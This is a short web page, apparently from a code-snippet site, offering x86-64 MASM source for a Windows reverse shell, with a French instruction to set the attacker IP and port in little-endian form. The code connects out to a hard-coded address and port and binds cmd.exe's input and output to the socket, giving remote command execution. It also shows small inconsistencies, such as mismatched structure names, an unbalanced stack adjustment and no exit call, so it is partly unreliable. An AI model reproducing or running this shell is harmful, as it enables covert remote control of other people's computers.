Skip to main content

[ASM] Windows reverse shell

Code

Remplacer l'IP et le port au format Little Endian.

extrn ExitProcess :PROC

extrn WSAStartup :PROC
extrn WSASocketA :PROC
extrn WSAConnect :PROC
extrn CreateProcessA :PROC

; Définir les valeurs de longueur manquantes
WSADESCRIPTION_LEN equ 256
WSASYS_STATUS_LEN equ 128

sockaddr_in STRUC
    sin_family WORD ?
    sin_port WORD ?
    sin_addr DWORD ?
    sin_zero BYTE 8 DUP (?)
sockaddr_in ENDS

_wsadata STRUC
    wVersion WORD ?
    wHighVersion WORD ?
    szDescription BYTE (WSADESCRIPTION_LEN + 1) DUP (?)
    szSystemStatus BYTE (WSASYS_STATUS_LEN + 1) DUP (?)
    iMaxSockets WORD ?
    iMaxUdpDg WORD ?
    IpVendorInfo QWORD ?
_wsadata ENDS

_startupinfoa STRUC
    cb DWORD ?
    align_1 BYTE 4 dup (?)
    IpReserved QWORD ?
    IpDesktop QWORD ?
    IpTitle QWORD ?
    dwX DWORD ?
    dwY DWORD ?
    dwXSize DWORD ?
    dwYSize DWORD ?
    dwXCountChars DWORD ?
    dwYCountChars DWORD ?
    dwFillAttribute DWORD ?
    dwFlags DWORD ?
    wShowWindow WORD ?
    cbReserved2 WORD ?
    align_2 BYTE 4 dup (?)
    lpReserved2 		QWORD ?
    hStdInput 		QWORD ?
    hStdOutput 		QWORD ?
    hStdError 		QWORD ?
_STARTUPINFOA ENDS

_PROCESS_INFORMATION STRUCT
    hProcess 	QWORD ?
    hThread 	QWORD ?
    dwProcessId 	DWORD ?
    dwThreadId 	DWORD ?
_PROCESS_INFORMATION ENDS


.data

    ; WSAData
    WSAData _wsadata <>

    ; WSASocket
    sd DQ ?

    ; CreateProcessA
    SUInfo _STARTUPINFOA <>
    PrcInfo _PROCESS_INFORMATION <>

    ;caption DB "Caption", 0
    ;Key DB 6h
    ;user32_lib DB "User32.dll", 0

    ; Define IP & Port
    sa sockaddr_in <>
    ip DD 17AA8C0h
    port DW 5C11h

    ; CreateProcessA
    shell_str DB "cmd.exe", 0

.code
Start PROC

; Define sa structs
    MOV sa.sin_family, 2
    MOV ax, port
    MOV sa.sin_port, ax
    MOV eax, [ip]
    MOV sa.sin_addr, eax

; WSAStartup
    sub rsp, 28h

    MOV rcx, 2h
    LEA rdx, [WSAData]
    CALL WSAStartup

; WSASocketA
    sub rsp, 40h

    MOV rcx, 2
    MOV rdx, 1
    MOV r8, 6
    XOR r9, r9
    MOV qword ptr [rsp+20h], 0
    MOV qword ptr [rsp+28h], 0
    CALL WSASocketA
    MOV sd, rax
    ADD rsp, 40

; WSAConnect
    sub rsp, 28h

    MOV rcx, sd
    LEA rdx, sa
    MOV r8, SIZEOF sockaddr_in
    XOR r9, r9
    SUB rsp, 56
    MOV qword ptr [rsp+32], 0
    MOV qword ptr [rsp+40], 0
    MOV qword ptr [rsp+48], 0
    CALL WSAConnect
    ADD rsp, 56

; CreateProcessA
    sub rsp, 50h

    MOV rax, sd
    MOV [SUInfo.hStdInput], rax
    MOV [SUInfo.hStdOutput], rax
    MOV [SUInfo.hStdError], rax
    MOV [SUInfo.cb], SIZEOF _STARTUPINFOA
    MOV [SUInfo.dwFlags], 100h

    XOR rcx, rcx
    LEA rdx, shell_str
    XOR r8, r8
    XOR r9, r9

    MOV qword ptr [rsp+20h], 1
    MOV qword ptr [rsp+28h], 0
    MOV qword ptr [rsp+30h], 0
    MOV qword ptr [rsp+38h], 0
    LEA rax, SUInfo
    MOV qword ptr [rsp+40h], rax
    LEA rax, PrcInfo
    MOV qword ptr [rsp+48h], rax
    CALL CreateProcessA
    ADD rsp, 50h

Start ENDP
End

 

Back to top